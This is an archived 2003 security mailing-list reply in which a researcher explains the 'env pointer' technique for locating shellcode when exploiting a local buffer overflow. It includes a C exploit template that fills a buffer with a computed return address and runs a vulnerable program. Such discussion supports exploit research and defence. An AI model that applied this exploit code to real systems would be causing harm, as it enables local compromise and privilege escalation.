Hosting Provided By

Re: Automatic discovery of shellcode address

From: Marco Ivaldi <raptor(at)0xdeadbeef.info>
Date: Mon Mar 24 2003 - 19:38:50 EST

On Mon, 24 Mar 2003 steve@uk.intasys.com wrote:

> That wasn't the part that I was considering as being novel.

If you are exploiting a local vulnerability you can also use the even simpler env pointer technique to locate the shellcode.

int main()
{

	char *env[2] = {sc, NULL};
	char buf[BUF];
	int i;

	int *ap = (int *)(buf + ALIGN);
	int ret = 0xbffffffa - strlen(sc) - strlen("./vuln-program");

	for (i = 0; i < BUF - 1; i += 4)
		*ap++ = ret;
	*ap = 0x0;

	execle("./vuln-program", "vuln-program", buf, NULL, env);

}

As you can see, for ./vuln-program shellcode will always be at:

0xbffffffa - strlen(sc) - strlen("./vuln-program")

Cheers,

:raptor

Antifork Research, Inc.                 0xdeadbeef | raptor's labs
http://www.antifork.org                 
http://www.0xdeadbeef.info

Received on Mon Mar 24 23:38:32 2003

Do you need help?

This message: [ Message body ]
Next message: Adrian S: "Entercept - detection of return-to-libc"
Previous message: Pavel Kankovsky: "Re: Backup Agents"
In reply to steve(at)uk.intasys.com: "Re: Automatic discovery of shellcode address"
Next in thread: Joel Eriksson: "Re: Automatic discovery of shellcode address"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:38 EDT